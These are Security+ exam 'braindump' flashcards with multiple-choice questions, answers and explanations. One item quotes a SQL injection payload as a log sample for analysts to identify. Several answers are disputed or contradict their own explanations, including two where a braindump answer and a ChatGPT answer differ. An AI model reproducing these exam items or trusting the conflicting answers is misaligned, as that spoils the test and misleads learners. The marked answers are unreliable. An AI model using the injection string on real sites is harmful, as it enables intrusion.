Sy06 Exam Braindumps Flashcards

1
Q

A user is attempting to navigate to a website from inside the company network using a desktop. When the user types in the URL, https://www.site.com, the user is presented with a certificate mismatch warning from the browser. The user does not receive a warning when visiting http://www.anothersite.com. Which of the following describes this attack?

a. on-path
b. Domain hijacking
c. DNS poisoning
d. Evil twin

A

c. DNS poisoning

Here’s how DNS poisoning fits the scenario:

DNS Poisoning (or DNS Spoofing): This attack involves corrupting the DNS resolution process in order to redirect domain name lookups to malicious IP addresses. In this case, when the user tries to access https://www.site.com, the DNS responses could have been tampered with to redirect the user to a different (potentially malicious) IP address that does not match the expected SSL certificate for www.site.com. This causes the browser to display a certificate mismatch warning because the certificate presented by the server does not match the domain name requested by the user (www.site.com).

HTTP vs HTTPS: The lack of warnings for http://www.anothersite.com suggests that the DNS poisoning is specifically targeting HTTPS (SSL/TLS) connections (https://www.site.com). HTTP connections (http://www.anothersite.com) do not use SSL/TLS and thus do not trigger certificate mismatch warnings.

Here’s why the other options are less likely:

On-path: While an on-path attack involves intercepting and manipulating traffic between two parties, it typically does not specifically cause SSL certificate mismatch warnings unless combined with DNS poisoning or other techniques to redirect traffic.

Domain hijacking: Domain hijacking involves unauthorized changes to domain registration records, leading to control over the domain itself. While related, it does not directly cause certificate mismatch warnings as described.

Evil twin: An evil twin attack involves setting up a rogue Wi-Fi access point with the same name (SSID) as a legitimate one to intercept wireless communications. It is not directly related to DNS poisoning or causing certificate mismatch warnings in the context of accessing websites.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
2
Q

Which of the following tools is effective in preventing a user from accessing unauthorized removable media?

a. USB data blocker
b. Faraday cage
c. Proximity reader
d. Cable lock

A

a. USB data blocker

Explanation:

USB data blocker: This device is specifically designed to allow charging of a device while blocking data transfer through the USB port. This prevents unauthorized access to removable media by ensuring that data cannot be transferred to or from the USB port.

Other Options:

Faraday cage: This is a shield used to block electromagnetic fields. It is not designed for preventing access to removable media and is generally used for different purposes, such as preventing wireless communication.

Proximity reader: This is used for access control, such as securing physical entry to a location. It does not prevent access to removable media.

Cable lock: This is used to physically secure a device to prevent theft but does not control access to removable media.

Therefore, the USB data blocker is the most suitable tool for the specified purpose.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
3
Q

A Chief Security Officer is looking for a solution that can provide increased scalability and flexibility for back-end infrastructure, allowing it to be updated and modified without disruption to services. The security architect would like the solution selected to reduce the back-end server resources and has highlighted that session persistence is not important for the applications running on the back-end servers. Which of the following would BEST meet the requirements?

a. Reverse proxy
b. Automated patch management
c. snapshots
d. NIC teaming

A

a. Reverse proxy

Here’s how a reverse proxy aligns with the specified needs:

Increased scalability and flexibility: A reverse proxy can distribute client requests across multiple back-end servers, allowing for easier scaling by adding or removing servers as needed. It can also provide flexibility by routing requests based on various criteria (e.g., URL, headers).

Updating and modifying back-end infrastructure without disruption: A reverse proxy can route traffic to different versions of back-end servers seamlessly during updates or modifications, ensuring continuous service availability without interruptions.

Reducing back-end server resources: By offloading tasks like SSL termination, caching, and load balancing, a reverse proxy can optimize the usage of back-end server resources.

Session persistence not important: Reverse proxies can handle session management and load balancing without requiring session persistence on the back-end servers, which aligns with the stated preference.

Let’s briefly consider why the other options are less suitable:

Automated patch management: While important for security and maintenance, automated patch management primarily focuses on keeping servers up to date with the latest patches and updates. It doesn't directly address scalability, flexibility, or resource reduction.

Snapshots: Snapshots are a feature used for data protection and recovery but do not inherently provide scalability, flexibility, or resource reduction for back-end infrastructure.

NIC teaming: NIC teaming (or network bonding) is used to increase network bandwidth and provide redundancy, primarily at the network interface level. It does not directly address the scalability, flexibility, or resource reduction needs of back-end infrastructure in the context described.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
4
Q

Which of the following describes a social engineering technique that seeks to exploit a person’s sense of urgency?

a. A phishing email stating a cash settlement has been awarded but will expire soon
b. A smishing message stating a package is scheduled for pickup
c. A vishing call that requests a donation to be made to a local charity
d. A SPIM notification claiming to be undercover law enforcement investigating a cybercrime

A

a. A phishing email stating a cash settlement has been awarded but will expire soon

The social engineering technique that seeks to exploit a person’s sense of urgency is described in option A. By stating that a cash settlement has been awarded but will expire soon, the attacker creates a sense of urgency and tries to manipulate the recipient into taking immediate action without thoroughly considering the authenticity or legitimacy of the email. This technique aims to pressure the target into making a hasty decision or divulging sensitive information.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
5
Q

A security analyst is reviewing application logs to determine the source of a breach and locates the following log: https://www.comptia.com/login.php?id=’%20or%20’1’1=’1
Which of the following has been observed?

a. DLL Injection
b. API attack
c. SQL injection
d. XSS

A

c. SQL injection

The log entry provided (https://www.comptia.com/login.php?id=’%20or%20’1’1=’1) indicates a type of attack where a malicious actor is trying to manipulate the SQL query used by the application. This pattern matches the characteristics of a SQL injection attack.

SQL injection (SQLi) involves inserting or “injecting” SQL queries via the input data from the client to the application. This can allow attackers to bypass authentication, access, modify, or delete data, and execute administrative operations on the database.

The specific part of the log entry id=’%20or%20’1’1=’1 is a classic example of an SQL injection attempt. The attacker is trying to manipulate the SQL query logic to always evaluate to true (e.g., 1=1), which can potentially bypass login authentication or retrieve unauthorized information.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
6
Q

An audit identified PII being utilized in the development environment of a critical application. The Chief Privacy Officer (CPO) is adamant that this data must be removed; however, the developers are concerned that without real data they cannot perform functionality tests and search for specific data. Which of the following should a security professional implement to BEST satisfy both the CPO’s and the development team’s requirements?

a. Data anonymization
b. Data encryption
c. Data masking
d. Data tokenization

A

(Community C 54%, A 45% )

c. Data masking
Explanation:

Data masking: This technique involves creating a structurally similar but inauthentic version of an organization's data that can be used for purposes such as software testing and user training. It allows the developers to use data that appears real but doesn't contain actual sensitive information, thus satisfying the Chief Privacy Officer's (CPO) requirement to remove Personally Identifiable Information (PII) while still allowing the developers to perform functionality tests and search for specific data.

Why other options are less suitable:

Data anonymization: This method removes or modifies PII so that it can no longer be attributed to a specific individual. While it ensures privacy, it might alter the data to an extent that makes it less useful for testing specific functions or searches.

Data encryption: Encryption protects data by converting it into a coded format that is unreadable without a decryption key. While it secures the data, it doesn't help developers who need to interact with and test the functionality of the data in its original form.

Data tokenization: This process replaces sensitive data with unique identification symbols (tokens) that retain essential information without compromising security. Although it can be useful, tokenized data might not always be suitable for all types of functionality testing or specific searches needed by developers.

Therefore, data masking is the best option to meet both the privacy concerns of the CPO and the functional needs of the development team.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
7
Q

A company is implementing a DLP solution on the file server. The file server has PII, financial information, and health information stored on it. Depending on what type of data that is hosted on the file server, the company wants different DLP rules assigned to the data. Which of the following should the company do to help accomplish this goal?

a. Classify the data.
b. Mask the data.
c. Assign the application owner.
d. Perform a risk analysis.

A

a. Classify the data.

Classifying the data involves identifying and categorizing the types of data stored on the file server. This classification process allows the company to apply specific DLP rules tailored to each category of data. For example, different DLP policies can be enforced for PII, financial information, and health information once they are properly classified.

Here’s why the other options are less suitable in this context:

Mask the data: Data masking is a method of protecting sensitive information by replacing it with fictitious but realistic data. While it can enhance security, it does not help in creating and applying different DLP rules based on the data type.
Assign the application owner: While assigning ownership can help with accountability and management, it does not directly address the need to apply different DLP rules to different types of data.
Perform a risk analysis: Risk analysis helps identify potential threats and vulnerabilities, which is important for overall security strategy, but it does not directly assist in applying specific DLP rules based on the type of data.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
8
Q

A forensics investigator is examining a number of unauthorized payments that were reported on the company’s website. Some unusual log entries show users received an email for an unwanted mailing list and clicked on a link to attempt to unsubscribe. One of the users reported the email to the phishing team, and the forwarded email revealed the link to be:

<a>Click here to unsubscribe</a>

Which of the following will the forensics investigator MOST likely determine has occurred?

a. SQL injection
b. Broken authentication
c. XSS
d. XSRF

A

d. XSRF

The forensics investigator will most likely determine that a Cross-Site Request Forgery (CSRF) attack has occurred. In a CSRF attack, an attacker tricks a user into performing an unintended action on a website or application by forging a request that appears to come from a trusted source. In this case, the users were directed to a website where they unknowingly made unauthorized payments by clicking on a link in a phishing email. The link appears to be harmless, but actually contains code that instructs the user’s browser to make a payment on the company’s website. The unauthorized payments were made because the website accepted the forged request without verifying the authenticity of the request.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
9
Q

A report delivered to the Chief Information Security Officer (CISO) shows that some user credentials could be exfiltrated. The report also indicates that users tend to choose the same credentials on different systems and applications. Which of the following policies should the CISO use to prevent someone from using the exfiltrated credentials?

a. MFA
b. Lockout
c. Time-based logins
d. Password history

A

a. MFA (Multi-Factor Authentication)

Multi-Factor Authentication (MFA) significantly enhances security by requiring users to provide two or more verification factors to gain access to a resource such as an application, online account, or VPN. Even if an attacker obtains user credentials, they would still need the additional factor(s) to successfully log in, thus preventing unauthorized access.

Here’s why the other options are less suitable in this context:

Lockout: This policy locks an account after a certain number of failed login attempts, which helps to prevent brute force attacks but does not address the issue of stolen credentials being used successfully.
Time-based logins: Restricting logins to specific times can add a layer of security, but it does not prevent the use of stolen credentials outside of those times.
Password history: Enforcing password history prevents users from reusing recent passwords, but it does not prevent the use of current stolen credentials.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
10
Q

A company wants to simplify the certificate management process. The company has a single domain with several dozen subdomains, all of which are publicly accessible on the internet. Which of the following BEST describes the type of certificate the company should implement?

a. Subject alternative name
b. Wildcard
c. Self-signed
d. Domain validation

A

b. Wildcard

A wildcard certificate allows you to secure a single domain and all its subdomains with a single certificate. This greatly simplifies management because you don’t need a separate certificate for each subdomain. For example, a wildcard certificate for *.example.com would cover example.com, sub1.example.com, sub2.example.com, etc.

Here’s why the other options are less suitable:

Subject Alternative Name (SAN): SAN certificates can cover multiple specific domain names and subdomains, but they require each name to be listed explicitly in the certificate, which can be less efficient and more cumbersome to manage if the number of subdomains is large or if subdomains change frequently.
Self-signed: Self-signed certificates are not trusted by default by users' browsers and operating systems, making them unsuitable for public-facing websites.
Domain validation (DV): DV certificates indicate that the certificate authority has verified the domain ownership, but they do not simplify the management of multiple subdomains any more than any other type of certificate.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
11
Q

Which of the following is an effective tool to stop or prevent the exfiltration of data from a network?

a. DLP
b. NIDS
c. TPM
d. FDE

A

a. DLP (Data Loss Prevention)

Data Loss Prevention (DLP) solutions are specifically designed to detect and prevent unauthorized data transmissions or leaks outside of the network. DLP can monitor and control data transfers, enforce encryption, and block unauthorized sharing of sensitive information such as PII, financial data, and intellectual property.

Here’s why the other options are less suitable:

NIDS (Network Intrusion Detection System): NIDS can detect suspicious activities and potential intrusions on the network but doesn't specifically prevent data exfiltration. It is more about detection rather than prevention.
TPM (Trusted Platform Module): TPM is a hardware-based security feature used to secure hardware through integrated cryptographic keys, but it does not directly prevent data exfiltration from a network.
FDE (Full Disk Encryption): FDE protects data at rest by encrypting the entire contents of a disk. While it secures data on a device, it does not prevent data from being exfiltrated over the network.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
12
Q

Several attempts have been made to pick the door lock of a secure facility. As a result, the security engineer has been assigned to implement a stronger preventative access control. Which of the following would BEST complete the engineer’s assignment?

a. Replacing the traditional key with an RFID key
b. Installing and monitoring a camera facing the door
c. Setting motion-sensing lights to illuminate the door on activity
d. Surrounding the property with fencing and gates

A

a. Replacing the traditional key with an RFID key

To implement a stronger preventative access control for a secure facility, replacing the traditional key with an RFID key would be the best solution. This change enhances security by using a more modern and harder-to-pick locking mechanism.

Here’s why the other options are less suitable:

Installing and monitoring a camera facing the door: This is more of a detective control than a preventative control. It helps in monitoring and recording any attempts but does not prevent the attempts themselves.
Setting motion-sensing lights to illuminate the door on activity: This is also a deterrent and detection measure rather than a preventative one. It may discourage attempts but does not physically prevent access.
Surrounding the property with fencing and gates: While this can be part of a comprehensive security strategy, it does not directly strengthen the specific access control of the door itself. It addresses perimeter security rather than the point of entry that is being targeted.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
13
Q

Which of the following can be used by a monitoring tool to compare values and detect password leaks without providing the actual credentials?

a. Hashing
b. Tokenization
c. Masking
d. Encryption

A

a. Hashing

Hashing is a process where a cryptographic hash function is applied to data (in this case, passwords) to produce a fixed-size string of characters, which is often referred to as the hash value or hash code. This hash value is unique to the input data and is deterministic, meaning the same input will always produce the same hash output.

In the context of detecting password leaks without exposing actual credentials, a monitoring tool can hash passwords (either locally or using a secure protocol) and then compare these hashed values against known leaked hashes from breached databases. If a match is found, it indicates that a password has been compromised without the monitoring tool needing access to the actual plaintext passwords.

Here’s why the other options are not correct in this context:

Tokenization: Tokenization involves substituting sensitive data with a non-sensitive equivalent (token). It is used to protect data but does not inherently involve comparison or detection of password leaks.
Masking: Masking is the process of partially or completely hiding sensitive data (like passwords) by replacing it with placeholder characters. It does not facilitate the comparison or detection of password leaks.
Encryption: Encryption involves transforming data (plaintext) into a form (ciphertext) that is unreadable without the correct decryption key. While encryption secures data, it does not typically facilitate comparison for detecting password leaks unless the encrypted values are compared directly, which is less common in such monitoring scenarios.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
14
Q

A security engineer is building a file transfer solution to send files to a business partner. The users would like to drop off the files in a specific directory and have the server send the file to the business partner. The connection to the business partner is over the internet and needs to be secure. Which of the following can be used?

a. S/MIME
b. LDAPS
c. SSH
d. SRTP

A

c. SSH

SSH provides a secure, encrypted connection between two systems, typically used for remote access and file transfer. Here’s how it aligns with the requirements:

Secure connection: SSH encrypts the data transmitted between the client (where the files are dropped off) and the server (which sends the files to the business partner), ensuring confidentiality and integrity of the transferred files.

File transfer capability: SSH includes utilities like SCP (Secure Copy Protocol) or SFTP (SSH File Transfer Protocol) which allow secure file transfers over SSH connections. Users can drop off files in a specific directory on the server using SFTP or SCP commands.

Let’s briefly consider why the other options are less suitable in this context:

S/MIME: S/MIME (Secure/Multipurpose Internet Mail Extensions) is used for securing email messages, not directly for file transfer scenarios where files need to be stored in a directory and sent automatically to a business partner.

LDAPS: LDAPS (LDAP over SSL/TLS) is used for securing LDAP directory communications, not for file transfer scenarios as described.

SRTP: SRTP (Secure Real-time Transport Protocol) is used for securing VoIP (Voice over IP) communications, not for file transfer scenarios over the internet.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
15
Q

An administrator needs to protect user passwords and has been advised to hash the passwords. Which of the following BEST describes what the administrator is being advised to do?

a. Perform a mathematical operation on the passwords that will convert them into unique strings.
b. Add extra data to the passwords so their length is increased, making them harder to brute force.
c. Store all passwords in the system in a rainbow table that has a centralized location.
d. Enforce the use of one-time passwords that are changed for every login session.

A

a. Perform a mathematical operation on the passwords that will convert them into unique strings.

In the context of protecting user passwords, hashing is a cryptographic technique where passwords (or any other data) are converted into fixed-length strings of characters (hash values) using a mathematical algorithm. Hashing ensures that the original password cannot be easily derived from the hash value, providing a layer of security in case the hashed data is exposed or compromised.

Let’s briefly explain why the other options are not correct:

b. Add extra data to the passwords so their length is increased, making them harder to brute force: This describes password salting, not hashing. Salting involves adding a random value (salt) to each password before hashing to ensure that even identical passwords produce different hashes. While salting is an important technique, it's not the same as hashing itself.

c. Store all passwords in the system in a rainbow table that has a centralized location: Rainbow tables are precomputed tables used to crack hashed passwords through reverse lookup. Storing passwords in a rainbow table would defeat the purpose of hashing for security.

d. Enforce the use of one-time passwords that are changed for every login session: One-time passwords are not related to hashing passwords. They are temporary passwords that are valid for a single login session and are typically used for two-factor authentication (2FA) or multi-factor authentication (MFA).
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
16
Q

Which of the following would be indicative of a hidden audio file found inside of a piece of source code?

a. Steganography
b. Homomorphic encryption
c. Cipher suite
d. Blockchain

A

a. Steganography

Steganography is the practice of concealing a file, message, image, or video within another file, message, image, or video. In the context of a hidden audio file found inside of a piece of source code, steganography would be the technique used to embed the audio file within the source code without altering the functionality or appearance of the source code itself. This allows the audio file to remain hidden unless someone knows how to extract it using specific tools or methods designed for steganographic detection.

Here’s why the other options are not correct:

b. Homomorphic encryption: Homomorphic encryption is a form of encryption that allows computations to be performed on encrypted data without decrypting it first. It is not related to embedding audio files within source code.

c. Cipher suite: A cipher suite is a set of cryptographic algorithms used for securing network connections. It is not related to hiding audio files within source code.

d. Blockchain: Blockchain is a decentralized digital ledger technology used for recording transactions across multiple computers. It does not relate to embedding audio files within source code.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
17
Q

A user enters a username and a password at the login screen for a web portal. A few seconds later the following message appears on the screen:
Please use a combination of numbers, special characters, and letters in the password field.
Which of the following concepts does this message describe?

a. Password complexity
b. Password reuse
c. Password history
d. Password age

A

a. Password complexity

Password complexity refers to the requirements and rules imposed on passwords to ensure they are sufficiently strong and resistant to various forms of attack. Common complexity requirements include using a combination of uppercase letters, lowercase letters, numbers, and special characters. These requirements aim to increase the difficulty of guessing or brute-forcing passwords.

Here’s a brief overview of the other options:

b. Password reuse: This concept relates to using the same password across multiple accounts or systems, which can pose security risks if one account is compromised.

c. Password history: Password history refers to a security feature that prevents users from reusing previous passwords, enhancing security by ensuring passwords are not reused consecutively.

d. Password age: Password age refers to the length of time a password has been in use before it needs to be changed as part of a password policy.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
18
Q

A company recently experienced an inside attack using a corporate machine that resulted in data compromise. Analysis indicated an unauthorized change to the software circumvented technological protection measures. The analyst was tasked with determining the best method to ensure the integrity of the systems remains intact and local and remote boot attestation can take place. Which of the following would provide the BEST solution?

a. HIPS
b. FIM
c. TPM
d. DLP

A

c. TPM (Trusted Platform Module)

TPM (Trusted Platform Module) is a hardware-based security feature that provides a secure area within the system for storing cryptographic keys, certificates, and measurements. It enables several security functions, including secure boot attestation, which verifies the integrity of system components during the boot process. Here’s how TPM aligns with the requirements:

Integrity of systems: TPM ensures the integrity of the system by securely storing measurements (hashes) of boot components and providing these measurements for verification during the boot process. Any unauthorized changes to the software or system configurations can be detected through these measurements.

Local and remote boot attestation: TPM supports both local and remote attestation mechanisms. Local attestation verifies the integrity of the system components locally, while remote attestation allows external entities (like a remote server or security service) to verify the system's integrity before allowing access or exchanging sensitive information.

Here’s why the other options are less suitable in this context:

a. HIPS (Host-based Intrusion Prevention System): HIPS monitors and analyzes the internals of a computing system, but it does not inherently provide the cryptographic capabilities or secure storage necessary for boot attestation.

b. FIM (File Integrity Monitoring): FIM detects changes to files and system configurations, but it primarily focuses on monitoring file changes rather than providing the comprehensive security features required for boot attestation and ensuring the integrity of the entire system.

d. DLP (Data Loss Prevention): DLP solutions focus on protecting data from unauthorized access and exfiltration rather than ensuring the integrity of system components and supporting boot attestation.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
19
Q

Which of the following is a reason to publish files’ hashes?

a. To validate the integrity of the files
b. To verify if the software was digitally signed
c. To use the hash as a software activation key
d. To use the hash as a decryption passphrase

A

a. To validate the integrity of the files

Publishing files’ hashes allows users to verify the integrity of downloaded files by comparing the hash provided by the publisher with the hash computed from the downloaded file. If the hashes match, it indicates that the file has not been tampered with or corrupted during transmission.

Here’s why the other options are not correct:

b. To verify if the software was digitally signed: Digital signatures are used to verify the authenticity and integrity of software, not hashes. Digital signatures include a hash of the signed content, but the primary purpose of publishing a digital signature is to verify the signer's identity and ensure the software has not been tampered with since it was signed.

c. To use the hash as a software activation key: Hashes are not used as activation keys for software. Activation keys typically are alphanumeric codes that are used to activate or validate software licenses.

d. To use the hash as a decryption passphrase: Hashes are not used directly as decryption passphrases. Passphrases are typically longer and more complex strings used to decrypt encrypted data.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
20
Q

A security manager has tasked the security operations center with locating all web servers that respond to an unsecure protocol. Which of the following commands could an analyst run to find the requested servers?

a. nslookup 10.10.10.0
b. nmap -p 80 10.10.10.0/24
c. pathping 10.10.10.0 -p 80
d. ne -l -p 80

A

b. nmap -p 80 10.10.10.0/24

Here’s how this command works:

nmap: Nmap (Network Mapper) is a network scanning tool used for discovering hosts and services on a computer network.
-p 80: This option specifies that Nmap should scan for hosts that have port 80 (HTTP) open.
10.10.10.0/24: This is the network range in CIDR notation (Classless Inter-Domain Routing), which specifies a range of IP addresses to scan. /24 indicates that it's scanning all IP addresses from 10.10.10.0 to 10.10.10.255.

Explanation of why the other options are incorrect:

a. nslookup 10.10.10.0: nslookup is used to query DNS servers for domain name information. It does not scan for open ports on servers.

c. pathping 10.10.10.0 -p 80: pathping is used to trace the route packets take to a network host, not to scan for open ports.

d. ne -l -p 80: There is no commonly known command ne with options -l and -p 80. It does not appear to be a valid command for the intended purpose.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
21
Q

Which biometric error would allow an unauthorized user to access a system?

a. False acceptance
b. False entrance
c. False rejection
d. False denial

A

a. False acceptance

False acceptance occurs when the biometric system incorrectly identifies an unauthorized user as an authorized one. In other words, the system mistakenly accepts an impostor’s biometric data (such as fingerprints, facial features, iris patterns, etc.) as belonging to an authorized user, granting access when it should not.

Here’s a brief explanation of the other options:

b. False entrance: This term is not commonly used in the context of biometrics. It does not describe a recognized biometric error.

c. False rejection: This occurs when the biometric system incorrectly rejects an authorized user, denying access to someone who should be allowed in. It's the opposite error to false acceptance.

d. False denial: This term is also not commonly used in the context of biometrics. It does not describe a recognized biometric error.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
22
Q

A company is auditing the manner in which its European customers’ personal information is handled. Which of the following should the company consult?

a. GDPR
b. ISO
c. NIST
d. PCI DSS

A

a. GDPR (General Data Protection Regulation)

GDPR is the European Union regulation that governs the handling of personal data of individuals within the EU and European Economic Area (EEA). It outlines specific requirements and standards for the protection and processing of personal data. Since the company is auditing the handling of personal information of its European customers, GDPR compliance is crucial to ensure that they are meeting the legal obligations regarding data protection.

Here’s a brief explanation of the other options:

b. ISO (International Organization for Standardization): ISO standards cover various aspects of business operations, including information security (e.g., ISO/IEC 27001). While ISO standards provide frameworks for best practices, they do not specifically address legal requirements for data protection like GDPR.

c. NIST (National Institute of Standards and Technology): NIST provides cybersecurity and privacy frameworks and guidelines, primarily used in the United States. While NIST frameworks can be beneficial for enhancing security practices, they are not specific to GDPR compliance.

d. PCI DSS (Payment Card Industry Data Security Standard): PCI DSS is a security standard for organizations that handle credit card information. It does not apply to the broader scope of personal data handling regulated by GDPR.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
23
Q

Which of the following are common VoIP-associated vulnerabilities? (Choose two.)

a. SPIM
b. Vishing
c. Hopping
d. Phishing
e. Credential harvesting
f. Tailgating

A

(Braindump)
a. SPIM
b. Vishing

SPIM (Spam over Internet Messaging) is a type of VoIP-associated vulnerability that involves sending unsolicited or
fraudulent messages over an internet messaging service, such as Skype or WhatsApp. It can trick users into clicking on
malicious links, downloading malware, providing personal or financial information, etc., by impersonating a legitimate
entity or creating a sense of urgency or curiosity. Vishing (Voice Phishing) is a type of VoIP-associated vulnerability
that involves making unsolicited or fraudulent phone calls over an internet telephony service, such as Google Voice or
Vonage. It can trick users into disclosing personal or financial information, following malicious instructions,
transferring money, etc., by using voice spoofing, caller ID spoofing, or interactive voice response systems.

vlan hopping one was of the choices on my exam, but credential harvesting was not! IDK which one is correct besides vishing, but cred harvesting wasn’t there. This would mean SPIM was the other answer.

(Community BE 43%, AB 42%)
ChatGPT
b. Vishing
e. Credential harvesting

Explanation:

Vishing (Voice Phishing): This is a type of phishing attack that uses phone calls to trick users into revealing sensitive information. It's a common vulnerability in VoIP systems because attackers can spoof caller IDs to appear as legitimate sources, making it easier to deceive victims.

Credential Harvesting: This involves the theft of login credentials, such as usernames and passwords, which can be used to gain unauthorized access to VoIP systems and services. Attackers may use various techniques, including social engineering and malware, to harvest credentials.

Why the other options are not correct:

a. SPIM (Spam over Instant Messaging): This is related to instant messaging services rather than VoIP specifically.

c. Hopping: This is not a commonly recognized term associated with VoIP vulnerabilities.

d. Phishing: While phishing is a common cybersecurity threat, it typically involves email or text messages rather than VoIP-specific methods like vishing.

f. Tailgating: This is a physical security breach where an unauthorized person follows an authorized person into a secure area, not related to VoIP vulnerabilities.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
24
Q

Which of the following describes the exploitation of an interactive process to gain access to restricted areas?

a. Persistence
b. Buffer overflow
c. Privilege escalation
d. Pharming

A

c. Privilege escalation

Privilege escalation refers to the exploitation of a vulnerability or design flaw in an interactive process to gain elevated privileges that are normally not allowed for an attacker. This could involve escalating from a regular user account to an administrator or root level access, thereby gaining access to restricted areas or resources.

Here’s how the other options differ:

a. Persistence: Persistence refers to techniques used by attackers to maintain access to a system or network after initial access has been achieved, often through means like installing backdoors or modifying system configurations.

b. Buffer overflow: A buffer overflow is a type of software vulnerability where an attacker overwrites memory adjacent to a buffer to execute malicious code or gain control of the program's execution flow.

d. Pharming: Pharming is a cyber attack intended to redirect a website's traffic to a fake website controlled by the attacker, typically through DNS hijacking or poisoning.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
25
Q

An organization is planning to open other data centers to sustain operations in the event of a natural disaster. Which of the following considerations would BEST support the organization’s resiliency?

a. Geographic dispersal
b. Generator power
c. Fire suppression
d. Facility automation

A

a. Geographic dispersal

Geographic dispersal involves establishing data centers in different geographical locations that are not likely to be affected simultaneously by the same natural disaster. This strategy ensures that if one data center is impacted by a disaster (such as a hurricane, earthquake, or flood), operations can continue from another location without significant interruption.

Here’s how the other options compare:

b. Generator power: Generator power is important for providing backup electricity in case of power outages, but it alone does not ensure resiliency across different locations.

c. Fire suppression: Fire suppression systems are crucial for protecting equipment and data from fire damage within a single data center but do not address resiliency across multiple locations.

d. Facility automation: Facility automation can improve operational efficiency and response times but does not directly address the geographic dispersal needed for resiliency against natural disasters.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
26
Q

A security engineer is deploying a new wireless network for a company. The company shares office space with multiple tenants. Which of the following should the engineer configure on the wireless network to ensure that confidential data is not exposed to unauthorized users?

a. EAP
b. TLS
c. HTTPS
d. AES

A

d. AES
Explanation:

AES (Advanced Encryption Standard) is a symmetric encryption algorithm that provides strong encryption for data. When deploying a wireless network, configuring the wireless encryption protocol to use AES ensures that the data transmitted over the network is encrypted and protected from unauthorized access.
Why the other options are not the best choice for this scenario:

a. EAP (Extensible Authentication Protocol): EAP is a framework for authentication, often used in wireless networks. While important for ensuring that only authorized users can connect to the network, it does not itself provide data encryption.

b. TLS (Transport Layer Security): TLS is a cryptographic protocol designed to provide secure communication over a computer network. While it is used in many applications, including HTTPS, it is not specifically used to secure wireless networks at the data link layer.

c. HTTPS (HyperText Transfer Protocol Secure): HTTPS is used to secure communications over the internet, specifically for web traffic. It ensures that data sent between the browser and the web server is encrypted. However, it is not directly related to securing wireless network communications.

By configuring the wireless network to use AES encryption, the security engineer ensures that all data transmitted over the wireless network is encrypted and protected from eavesdropping and unauthorized access, which is crucial in a shared office space environment.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
27
Q

The Chief Compliance Officer from a bank has approved a background check policy for all new hires. Which of the following is the policy MOST likely protecting against?

a. Preventing any current employees’ siblings from working at the bank to prevent nepotism
b. Hiring an employee who has been convicted of theft to adhere to industry compliance
c. Filtering applicants who have added false information to resumes so they appear better qualified
d. Ensuring no new hires have worked at other banks that may be trying to steal customer information

A

b. Hiring an employee who has been convicted of theft to adhere to industry compliance

Background checks are commonly implemented to screen prospective employees for criminal records, including convictions related to theft or fraud. This helps banks comply with industry regulations that require employees to be trustworthy and maintain high standards of integrity, especially when handling sensitive financial information and transactions.

Here’s a brief explanation of the other options:

a. Preventing any current employees' siblings from working at the bank to prevent nepotism: This scenario relates to nepotism policies rather than criminal background checks.

c. Filtering applicants who have added false information to resumes so they appear better qualified: This relates more to verifying qualifications and honesty rather than criminal background checks.

d. Ensuring no new hires have worked at other banks that may be trying to steal customer information: While it's important to prevent insider threats and ensure data security, this is not typically the primary focus of background checks. Instead, it may be addressed through other security measures and employment history checks.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
28
Q

An engineer recently deployed a group of 100 web servers in a cloud environment. Per the security policy, all web-server ports except 443 should be disabled.
Which of the following can be used to accomplish this task?

a. Application allow list
b. SWG
c. Host-based firewall
d. VPN

A

(Braindump) b. SWG

c. Host-based firewall

Explanation:

Host-based firewall: This type of firewall runs on individual servers (in this case, the 100 web servers deployed in the cloud). It allows administrators to define and enforce rules regarding which network traffic is allowed to enter or leave the server. By configuring the host-based firewall on each web server to block all ports except 443 (HTTPS), you effectively restrict access to only HTTPS traffic while blocking other ports that are not necessary according to the security policy.

Here’s why the other options are less suitable:

a. Application allow list: An application allow list typically specifies which applications are allowed to run on a system or network, rather than controlling which ports are open or closed.

b. SWG (Secure Web Gateway): SWG is a security solution that provides visibility and control over web traffic, typically focusing on web content filtering, URL filtering, and malware protection. It does not directly control firewall rules on individual servers.

d. VPN (Virtual Private Network): VPN provides secure access to a private network over a public network, but it does not control firewall rules on servers or restrict specific ports on individual servers.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
29
Q

A technician was dispatched to complete repairs on a server in a data center. While locating the server, the technician entered a restricted area without authorization. Which of the following security controls would BEST prevent this in the future?

a. Use appropriate signage to mark all areas.
b. Utilize cameras monitored by guards.
c. Implement access control vestibules.
d. Enforce escorts to monitor all visitors.

A

c. Implement access control vestibules

Access control vestibules are physical security measures designed to restrict access to sensitive areas. They typically consist of a small enclosed space with two sets of doors: one leading to the outside or less secure area, and another leading to the restricted area. Access is granted through electronic authentication (such as badge readers or biometric scanners) before the inner door is unlocked, ensuring only authorized individuals can proceed.

Here’s how the other options compare:

a. Use appropriate signage to mark all areas: While signage is important for indicating restricted areas, it alone may not prevent unauthorized access if someone disregards the signage.

b. Utilize cameras monitored by guards: Cameras can provide surveillance and monitoring, but they are reactive and may not prevent unauthorized access in real-time.

d. Enforce escorts to monitor all visitors: Escorts can accompany visitors to ensure they only access authorized areas, but this may not be practical for all situations and can be resource-intensive.
How well did you know this?
